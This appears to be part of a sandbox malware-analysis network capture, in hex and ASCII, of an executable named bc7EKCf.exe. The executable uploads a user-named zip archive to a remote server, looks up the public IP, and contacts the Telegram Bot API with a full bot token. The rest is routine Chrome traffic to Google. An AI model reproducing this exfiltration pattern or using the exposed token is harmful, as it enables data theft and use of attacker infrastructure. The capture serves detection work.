                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.883017063 CET40OUTData Raw: 2d 2d 37 39 38 65 31 33 31 62 2d 35 36 36 36 2d 34 35 31 30 2d 61 64 61 61 2d 30 33 35 33 65 63 38 34 38 34 30 38 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: --798e131b-5666-4510-adaa-0353ec848408
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.888823986 CET163OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b
                                                                                                                                                                                                                                                                                                                  Data Ascii: Content-Type: application/octet-streamContent-Disposition: form-data; name=file; filename="user@618321_en-CH.zip"; filename*=utf-8''user%40618321_en-CH.zip
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.893757105 CET300OUTData Raw: 50 4b 03 04 14 00 09 00 08 00 6b 27 29 5a 00 00 00 00 00 00 00 00 00 00 00 00 50 4b 03 04 14 00 09 00 08 00 67 27 29 5a 00 00 00 00 00 00 00 00 00 00 00 00 50 4b 03 04 14 00 09 00 08 00 6b 27 29 5a 00 00 00 00 00 00 00 00 00 00 00 00 50 4b 03 04
                                                                                                                                                                                                                                                                                                                  Data Ascii: PKk')ZPKg')ZPKk')ZPKc')ZPK>CWPK>CWPK>CWPK>CWPKe')ZPK
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.127742052 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.260175943 CET368INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:25 GMT
                                                                                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Content-Length: 140
                                                                                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 46 69 6c 65 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 22 2c 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 6a 6f 6e 65 73 40 36 31 38 33 32 31 5f 65 6e 2d 43 48 2e 7a 69 70 22 2c 22 66 69 6c 65 5f 70 61 74 68 22 3a 22 6e 75 6c 6c 5c 2f 6a 6f 6e 65 73 40 36 31 38 33 32 31 5f 65 6e 2d 43 48 2e 7a 69 70 22 7d
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"status":"success","message":"File uploaded successfully!","file_name":"user@618321_en-CH.zip","file_path":"null\/user@618321_en-CH.zip"}


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  1192.168.2.460909104.16.185.241807536C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.017337084 CET63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: icanhazip.com
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.495218992 CET535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:26 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                  Content-Length: 13
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                                                                  Set-Cookie: __cf_bm=lwWziQLSxkGD1i9QGCjGgsHaBQ6vmTC5jbUtjlk6D2k-1736416766-1.0.1.1-hPqZdu6SbhvCV3VpLqOEVsc2KBr8Q6Dq0tTJUNAPrptF7vxNQumffaYHf1SCcbf0iYP1se17h9NBzI9exFbTww; path=/; expires=Thu, 09-Jan-25 10:29:26 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8ff393163ca70f79-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 8.46.123.189


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  0192.168.2.449735149.154.167.2204437536C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:06 UTC121OUTGET /bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/getMe HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:06 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:06 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                                                                                  Content-Length: 255
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:06 UTC255INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 37 38 33 31 38 36 37 32 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6e 69 73 74 72 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 69 6e 69 73 74 72 79 30 78 31 32 32 5f 62 6f 74 22 2c 22 63 61 6e 5f 6a 6f 69 6e 5f 67 72 6f 75 70 73 22 3a 74 72 75 65 2c 22 63 61 6e 5f 72 65 61 64 5f 61 6c 6c 5f 67 72 6f 75 70 5f 6d 65 73 73 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 73 75 70 70 6f 72 74 73 5f 69 6e 6c 69 6e 65 5f 71 75 65 72 69 65 73 22 3a 66 61 6c 73 65 2c 22 63 61 6e 5f 63 6f 6e 6e 65 63 74 5f 74 6f 5f 62 75 73 69 6e 65 73 73 22 3a 66 61 6c 73 65 2c 22 68 61 73 5f 6d 61 69 6e 5f 77 65 62 5f 61 70 70 22 3a 66 61 6c 73 65 7d 7d
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"ok":true,"result":{"id":7831867283,"is_bot":true,"first_name":"Ministry","username":"Ministry0x122_bot","can_join_groups":true,"can_read_all_group_messages":false,"supports_inline_queries":false,"can_connect_to_business":false,"has_main_web_app":false}}


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  1192.168.2.449736216.58.206.684438092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:10 GMT
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-rw4p1c35WuFDyhb9CeVx1g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/web
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/web"}]}
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC171INData Raw: 61 37 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 5d 2c 5b 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 22 38 32 30 30 34 38 34 34 34 35 33 39 32 37 34 39 34 38 32 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 5d 2c 22 67 6f 6f 67 6c 65 3a 76 65 72 62 61 74 69 6d 72 65 6c 65 76 61 6e 63 65 22 3a 38 35 31 7d 5d
                                                                                                                                                                                                                                                                                                                  Data Ascii: a7)]}'["",[],[],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggesteventid":"8200484445392749482","google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  2192.168.2.449741216.58.206.684438092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC361OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  3192.168.2.449740216.58.206.684438092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC973INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Version: 712423320
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:10 GMT
                                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC417INData Raw: 33 38 63 35 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                                                  Data Ascii: 38c5)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 33 20 31 38 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 35 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 37 76 32 68 31 38
                                                                                                                                                                                                                                                                                                                  Data Ascii: ss\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1390INData Raw: 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 41 64 20 67 62 5f 6c 64 20 67 62 5f 4b 65 20 67 62 5f 46 65 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63
                                                                                                                                                                                                                                                                                                                  Data Ascii: e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_Ad gb_ld gb_Ke gb_Fe\"\u003e\u003c
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1390INData Raw: 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 38 2e 35 2d 32 31 2e 35 54 33 35 30 2d 38 34 30 68 32 36 30 71 31 33 20 30 20 32 31 2e 35 20 38 2e 35 54 36 34 30 2d 38 31 30 71 30 20
                                                                                                                                                                                                                                                                                                                  Data Ascii: ght\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13 8.5-21.5T350-840h260q13 0 21.5 8.5T640-810q0
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1390INData Raw: 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 5c 22 5c 75 30 30
                                                                                                                                                                                                                                                                                                                  Data Ascii: ,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2z\"\u00
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1390INData Raw: 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 36 39 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 42 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                  Data Ascii: eriment_id":[3700269,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.Bd\u003dfunction
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:10 UTC1390INData Raw: 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4b 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4a 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4c 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4d 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b
